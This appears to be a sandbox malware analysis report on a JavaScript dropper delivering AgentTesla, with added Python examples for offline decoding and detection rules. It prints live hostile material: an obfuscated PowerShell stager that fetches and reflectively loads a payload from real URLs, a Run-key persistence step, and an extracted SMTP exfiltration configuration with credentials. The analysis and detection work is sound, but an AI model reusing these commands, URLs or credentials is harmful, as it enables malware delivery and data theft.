9? ? ? ? C? ? ? ? ? ? ? ? TgBl? ? ? ? Hc? ? ? ? LQBP? ? ? ? GI? ? ? ? agBl? ? ? ? GM? ? ? ? d? ? ? ? ? ? ? ? g? ? ? ? FM? ? ? ? eQBz? ? ? ? HQ? ? ? ? ZQBt? ? ? ? C4? ? ? ? TgBl? ? ? ? HQ? ? ? ? LgBX? ? ? ? GU? ? ? ? YgBD? ? ? ? Gw? ? ? ? aQBl? ? ? ? G4? ? ? ? d? ? ? ? ? ? ? ? 7? ? ? ? CQ? ? ? ? aQBt? ? ? ? GE? ? ? ? ZwBl? ? ? ? EI? ? ? ? eQB0? ? ? ? GU? ? ? ? cw? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? ? ? ? ? k? ? ? ? Hc? ? ? ? ZQBi? ? ? ? EM? ? ? ? b? ? ? ? Bp? ? ? ? GU? ? ? ? bgB0? ? ? ? C4? ? ? ? R? ? ? ? Bv? ? ? ? Hc? ? ? ? bgBs? ? ? ? G8? ? ? ? YQBk? ? ? ? EQ? ? ? ? YQB0? ? ? ? GE? ? ? ? K? ? ? ? ? ? ? ? k? ? ? ? Gk? ? ? ? bQBh? ? ? ? Gc? ? ? ? ZQBV? ? ? ? HI? ? ? ? b? ? ? ? ? ? ? ? p? ? ? ? Ds? ? ? ? J? ? ? ? Bp? ? ? ? G0? ? ? ? YQBn? ? ? ? GU? ? ? ? V? ? ? ? Bl? ? ? ? Hg? ? ? ? d? ? ? ? ? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? Bb? ? ? ? FM? ? ? ? eQBz? ? ? ? HQ? ? ? ? ZQBt? ? ? ? C4? ? ? ? 
V? ? ? ? Bl? ? ? ? Hg? ? ? ? d? ? ? ? ? ? ? ? u? ? ? ? EU? ? ? ? bgBj? ? ? ? G8? ? ? ? Z? ? ? ? Bp? ? ? ? G4? ? ? ? ZwBd? ? ? ? Do? ? ? ? OgBV? ? ? ? FQ? ? ? ? Rg? ? ? ? 4? ? ? ? C4? ? ? ? RwBl? ? ? ? HQ? ? ? ? UwB0? ? ? ? HI? ? ? ? aQBu? ? ? ? Gc? ? ? ? K? ? ? ? ? ? ? ? k? ? ? ? Gk? ? ? ? bQBh? ? ? ? Gc? ? ? ? ZQBC? ? ? ? Hk? ? ? ? d? ? ? ? Bl? ? ? ? HM? ? ? ? KQ? ? ? ? 7? ? ? ? CQ? ? ? ? cwB0? ? ? ? GE? ? ? ? cgB0? ? ? ? EY? ? ? ? b? ? ? ? Bh? ? ? ? Gc? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? Jw? ? ? ? 8? ? ? ? Dw? ? ? ? QgBB? ? ? ? FM? ? ? ? RQ? ? ? ? 2? ? ? ? DQ? ? ? ? XwBT? ? ? ? FQ? ? ? ? QQBS? ? ? ? FQ? ? ? ? Pg? ? ? ? +? ? ? ? Cc? ? ? ? Ow? ? ? ? k? ? ? ? GU? ? ? ? bgBk? ? ? ? EY? ? ? ? b? ? ? ? Bh? ? ? ? Gc? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? Jw? ? ? ? 8? ? ? ? Dw? ? ? ? QgBB? ? ? ? FM? ? ? ? RQ? ? ? ? 2? ? ? ? DQ? ? ? ? XwBF? ? ? ? E4? ? ? ? R? ? ? ? ? ? ? ? +? ? ? ? D4? ? ? ? Jw? ? ? ? 7? ? ? ? CQ? ? ? ? cwB0? ? ? ? GE? ? ? ? cgB0? ? ? ? Ek? ? ? ? bgBk? ? ? ? GU? ? ? ? e? ? ? ? ? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? ? ? ? ? k? ? ? ? Gk? ? ? ? bQBh? ? ? ? Gc? ? ? ? ZQBU? ? ? ?
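The Sigma hits above show two stager layers: the outer powershell.exe runs `$Codigo = '...'`, a UTF-16LE command base64-encoded with every `A` swapped for a filler that the report renders as `? ? ? ?`; the child powershell.exe it launches downloads deathnote.jpg, carves the text between `<<BASE64_START>>` and `<<BASE64_END>>`, base64-decodes it, loads the result with `[System.Reflection.Assembly]::Load` and calls `dnlib.IO.Home.VAI` with a first argument that reads backwards (`//:sptth`). Both layers can be triaged offline. The Python below is an added example, not code from the sandbox, the sample or dnlib: the `$Codigo` fragment and the VAI call are copied from the report; the mapping of one rendered `? ? ? ?` token to one substituted `A` is an assumption that the decode confirms (it yields the child command seen above); the "image" and its payload are constructed stand-ins, so nothing is fetched from the live URLs.

```python
"""Offline triage of the two PowerShell stager layers printed in this report.

Added example, not code from the sandbox, the sample or dnlib. The $Codigo
fragment and the VAI() call are copied from the report; the "image" blob is a
constructed stand-in for deathnote.jpg so nothing is fetched from the live URLs.
"""
import base64
import re

# Layer 1: `$Codigo = '...'` is base64 of a UTF-16LE command in which every 'A'
# was swapped for a filler token. The report renders that filler as "? ? ? ?".
# Assumption: one rendered token == one substituted 'A'; the decode below only
# yields the command seen in the child process if that holds.
FILLER = "? ? ? ?"

CODIGO_FRAGMENT = (  # first 58 base64 groups of $Codigo, as printed in the report
    "J? ? ? ? Bp? ? ? ? G0? ? ? ? YQBn? ? ? ? GU? ? ? ? VQBy? ? ? ? Gw? ? ? ? "
    "I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? JwBo? ? ? ? HQ? ? ? ? d? ? ? ? Bw? ? ? ? "
    "HM? ? ? ? Og? ? ? ? v? ? ? ? C8? ? ? ? aQBh? ? ? ? DY? ? ? ? M? ? ? ? ? ? ? ? x? ? ? ? "
    "DY? ? ? ? M? ? ? ? ? ? ? ? 2? ? ? ? C4? ? ? ? dQBz? ? ? ? C4? ? ? ? YQBy? ? ? ? GM? ? ? ? "
    "a? ? ? ? Bp? ? ? ? HY? ? ? ? ZQ? ? ? ? u? ? ? ? G8? ? ? ? cgBn? ? ? ? C8? ? ? ? MQ? ? ? ? "
    "w? ? ? ? C8? ? ? ? aQB0? ? ? ? GU? ? ? ? bQBz? ? ? ? C8? ? ? ? Z? ? ? ? Bl? ? ? ? GE? ? ? ? "
    "d? ? ? ? Bo? ? ? ? G4? ? ? ? bwB0? ? ? ? GU? ? ? ? Xw? ? ? ? y? ? ? ? D? ? ? ? ? ? ? ? "
    "Mg? ? ? ? 0? ? ? ? D? ? ? ? ? ? ? ? Nw? ? ? ? v? ? ? ? GQ? ? ? ? ZQBh? ? ? ? HQ? ? ? ? "
    "a? ? ? ? Bu? ? ? ? G8? ? ? ? d? ? ? ? Bl? ? ? ? C4? ? ? ? agBw? ? ? ? Gc? ? ? ? Jw? ? ? ? "
    "7? ? ? ? CQ? ? ? ?"
)


def decode_codigo(fragment: str) -> str:
    """Undo the filler substitution, then base64 + UTF-16LE decode.
    validate=True makes a wrong filler assumption fail loudly instead of
    silently producing garbage."""
    b64 = re.sub(r"\s+", "", fragment.replace(FILLER, "A"))
    return base64.b64decode(b64, validate=True).decode("utf-16-le")


# Layer 2: the child command's carving step, reproduced without running it.
START, END = "<<BASE64_START>>", "<<BASE64_END>>"


def carve_marked_payload(blob: bytes) -> bytes:
    """Decode the blob as UTF-8 the way UTF8.GetString does, locate the marker
    pair, base64-decode what lies between. The sample hands the result to
    Assembly::Load, so an analyst expects a PE ('MZ') here."""
    text = blob.decode("utf-8", errors="replace")
    s, e = text.find(START), text.find(END)
    if s < 0 or e <= s:
        raise ValueError("marker pair not found: not this stager's payload layout")
    return base64.b64decode(text[s + len(START):e])


def vai_arguments(cmdline: str) -> list:
    """Pull the quoted string arguments out of the `[object[]] (...)` passed to VAI."""
    tail = cmdline[cmdline.index("[object[]]"):]
    return re.findall(r"'([^']*)'", tail)


# Copied from the child powershell.exe command line in the report.
VAI_CALL = r'''$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&f815e5fb749106f21729c58ee9d5d4362f113d9dbc69e72e0b64b3c04c574c1d=mh&03aacc66=si&0bbfdc66=xe?txt.GIRO/9282559141872667721/9547513900813347721/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'padral','InstallUtil','desativado'))'''

# Constructed stand-in for deathnote.jpg: JPEG magic, binary junk, then the
# marker pair around a base64 payload. The payload is a fake PE header, not a
# real assembly.
FAKE_PAYLOAD = b"MZ\x90\x00" + b"constructed stand-in, not a real .NET assembly"
FAKE_IMAGE = (b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + bytes(range(256))
              + START.encode() + base64.b64encode(FAKE_PAYLOAD) + END.encode()
              + b"\xff\xd9")


def triage() -> dict:
    """Everything an analyst wants from the two layers, with no network access."""
    args = vai_arguments(VAI_CALL)
    payload = carve_marked_payload(FAKE_IMAGE)
    return {
        "layer1_command": decode_codigo(CODIGO_FRAGMENT),
        "payload_is_pe": payload[:2] == b"MZ",
        "payload_size": len(payload),
        "next_stage_url": args[0][::-1],   # first VAI argument is written backwards
        "drop_dir": args[2],               # compare with the padral.js Run-key value
        "drop_name": args[3],
        "host_process": args[4],           # compare with the InstallUtil.exe network event
    }


if __name__ == "__main__":
    for key, value in triage().items():
        print(f"{key}: {value}")
```

The decoded `$Codigo` prefix is the start of the child command line shown in the report, which is how the filler assumption is checked. The un-reversed first argument is a cdn.discordapp.com attachment URL (the real next-stage location), and the remaining arguments line up with what the sandbox observed afterwards: `C:\ProgramData\` plus `padral` is the dropped padral.js, and `InstallUtil` is the .NET utility that later opened the SMTP connection.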

                      Data Obfuscation

                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&f815e5fb749106f21729c58ee9d5d4362f113d9dbc69e72e0b64b3c04c574c1d=mh&03aacc66=si&0bbfdc66=xe?txt.GIRO/9282559141872667721/9547513900813347721/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'padral','InstallUtil','desativado'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, 
$base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&f815e5fb749106f21729c58ee9d5d4362f113d9dbc69e72e0b64b3c04c574c1d=mh&03aacc66=si&0bbfdc66=xe?txt.GIRO/9282559141872667721/9547513900813347721/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'padral','InstallUtil','desativado'))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? Bp? ? ? ? G0? ? ? ? YQBn? ? ? ? GU? ? ? ? VQBy? ? ? ? Gw? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? JwBo? ? ? ? HQ? ? ? ? d? ? ? ? Bw? ? ? ? HM? ? ? ? Og? ? ? ? v? ? ? ? C8? ? ? ? aQBh? ? ? ? DY? ?
                      Suricata alert: 2024-08-27T07:53:45.960744+0200, SID 2020423, severity 1, TCP source port 443 -> destination port 49705, classtype: Exploit Kit Activity Detected
                      Suricata alert: 2024-08-27T07:53:44.733271+0200, SID 2049038, severity 1, TCP source port 443 -> destination port 49704, classtype: A Network Trojan was detected


                      AV Detection

                      Source: https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg, Avira URL Cloud: Label: malware
                      Source: 8.2.InstallUtil.exe.400000.0.unpack, Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.zoho.eu", "Username": "logs@astonherald.com", "Password": "office12#"}
                      Source: RFQ448903423_MAT_HASUE_de_Mexico.js, Virustotal: Detection: 13%
                      Source: unknown, HTTPS traffic detected: 207.241.227.86:443 -> 192.168.2.5:49704 version: TLS 1.2
                      Source: unknown, HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.5:49705 version: TLS 1.2
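The behaviours this report flags (wscript.exe running a .js from the user's Desktop, powershell.exe spawned from it, a second powershell.exe with `-executionpolicy bypass` that downloads and reflectively loads an assembly with a reversed URL in its arguments, cmd.exe copying the script to C:\ProgramData\padral.js, a Run-key value pointing at that script, and InstallUtil.exe opening TCP 587 to match the extracted AgentTesla SMTP config) reduce to a handful of field checks over process, registry and network events. The Python below is an added example of that detection logic, not Joe Sandbox's, Sigma's or the sample's code; the event records are constructed here from field values the report prints, in a simplified Sysmon-like shape. PID 4321 is a placeholder because the report does not print the PID of the outer powershell.exe, and the rule names are this example's own, not Sigma rule titles.

```python
"""Detection pass over constructed records of the process, registry and network
events printed in this report.

Added example; not Joe Sandbox's, Sigma's or the sample's code. Each record
is built from field values the report prints (images, PIDs, command lines,
registry target, destination port) in a simplified Sysmon-like shape.
PID 4321 is a placeholder: the report does not print the outer powershell's PID.
"""
import re

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Child powershell.exe command line, verbatim from the report.
STAGER = r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&f815e5fb749106f21729c58ee9d5d4362f113d9dbc69e72e0b64b3c04c574c1d=mh&03aacc66=si&0bbfdc66=xe?txt.GIRO/9282559141872667721/9547513900813347721/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'padral','InstallUtil','desativado'))"'''

EVENTS = [
    {"kind": "process", "pid": 652, "ppid": 1028, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ448903423_MAT_HASUE_de_Mexico.js"'},
    {"kind": "process", "pid": 4321, "ppid": 652, "image": PS,   # pid 4321 is a placeholder
     "cmdline": '"' + PS + "\" -command $Codigo = 'J? ? ? ? Bp? ? ? ? G0? ? ? ? YQBn? ? ? ? GU"},  # truncated
    {"kind": "process", "pid": 1964, "ppid": 4321, "image": PS, "cmdline": STAGER},
    {"kind": "process", "pid": 6784, "ppid": 1964, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\padral.js"'},
    {"kind": "registry", "pid": 1964, "image": PS, "event_type": "SetValue",
     "target": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Path",
     "details": r"C:\ProgramData\padral.js"},
    {"kind": "network", "pid": 1632, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe",
     "initiated": True, "protocol": "tcp", "dst_ip": "185.230.212.164", "dst_port": 587},
]

MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}  # processes allowed to speak SMTP


def _base(image: str) -> str:
    return image.lower().rsplit("\\", 1)[-1]


def ancestry(events, pid) -> str:
    """'child <- parent <- ...' for a PID, following ppid links we have records for."""
    procs = {e["pid"]: e for e in events if e["kind"] == "process"}
    chain = []
    while pid in procs:
        chain.append(_base(procs[pid]["image"]))
        pid = procs[pid]["ppid"]
    return " <- ".join(chain)


def run_rules(events) -> list:
    """Return (rule, pid) pairs; each rule mirrors one behaviour the report flags."""
    procs = {e["pid"]: e for e in events if e["kind"] == "process"}
    hits = []
    for e in events:
        img = _base(e["image"])
        if e["kind"] == "process":
            cl = e["cmdline"]
            parent = procs.get(e["ppid"])
            pimg = _base(parent["image"]) if parent else ""
            # script host launching a script that lives under a user profile
            if img in ("wscript.exe", "cscript.exe") and re.search(r'\\users\\.*\.(js|jse|vbs|vbe|wsf)"?$', cl, re.I):
                hits.append(("script_host_runs_user_script", e["pid"]))
            # powershell whose parent is a script host
            if img == "powershell.exe" and pimg in ("wscript.exe", "cscript.exe"):
                hits.append(("script_host_spawns_powershell", e["pid"]))
            # policy bypass + web download + in-memory assembly load in one command
            if (img == "powershell.exe" and re.search(r"-executionpolicy\s+bypass", cl, re.I)
                    and ".DownloadData(" in cl and "[System.Reflection.Assembly]::Load(" in cl):
                hits.append(("ps_download_and_load_assembly", e["pid"]))
            # 'https://' or 'http://' written backwards: the argument obfuscation used here
            if "//:sptth" in cl or "//:ptth" in cl:
                hits.append(("reversed_url_in_cmdline", e["pid"]))
            # cmd.exe staging a script into ProgramData for the Run key
            if img == "cmd.exe" and re.search(r"\bcopy\b.*\\programdata\\.*\.(js|vbs|bat|ps1)", cl, re.I):
                hits.append(("script_copied_to_programdata", e["pid"]))
        elif e["kind"] == "registry":
            if (e["event_type"] == "SetValue" and "\\currentversion\\run\\" in e["target"].lower()
                    and re.search(r"\\programdata\\.*\.(js|vbs|bat|ps1)$", e["details"], re.I)):
                hits.append(("run_key_points_to_script_in_programdata", e["pid"]))
        elif e["kind"] == "network":
            # outbound SMTP from a non-mail-client; here a .NET framework utility,
            # which is what the extracted AgentTesla config (SMTP, port 587) predicts
            if (e["initiated"] and e["protocol"] == "tcp" and e["dst_port"] in (25, 465, 587)
                    and img not in MAIL_CLIENTS):
                hits.append(("smtp_from_non_mail_client", e["pid"]))
    return hits


if __name__ == "__main__":
    for rule, pid in run_rules(EVENTS):
        print(f"{rule:40s} pid={pid:<6d} chain: {ancestry(EVENTS, pid) or '(no process record)'}")
```

The parent-chain string is what turns several medium-confidence hits into one high-confidence incident: cmd.exe <- powershell.exe <- powershell.exe <- wscript.exe, with the Run-key write and the SMTP connection hanging off that chain. The SMTP rule fires on InstallUtil.exe because the report's own network event (PID 1632, port 587) is the injected host; in a real environment the allow-list of mail clients needs tuning to what legitimately sends mail there.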
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdbX source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp

                      Software Vulnerabilities

                      Source: C:\Windows\System32\wscript.exe    Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                      Networking

                      Source: Network traffic    Suricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 162.159.135.233:443 -> 192.168.2.5:49705
                      Source: Network traffic    Suricata IDS: 2049038 - Severity 1 - ET MALWARE Malicious Base64 Encoded Payload In Image : 207.241.227.86:443 -> 192.168.2.5:49704
                      Source: Yara match    File source: Process Memory Space: powershell.exe PID: 1964, type: MEMORYSTR
                      Source: Yara match    File source: 8.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match    File source: 4.2.powershell.exe.1ce9038cb90.1.raw.unpack, type: UNPACKEDPE
                      Source: global traffic    TCP traffic: 192.168.2.5:49707 -> 185.230.212.164:587
                      Source: global traffic    HTTP traffic detected: GET /10/items/deathnote_202407/deathnote.jpg HTTP/1.1  Host: ia601606.us.archive.org  Connection: Keep-Alive
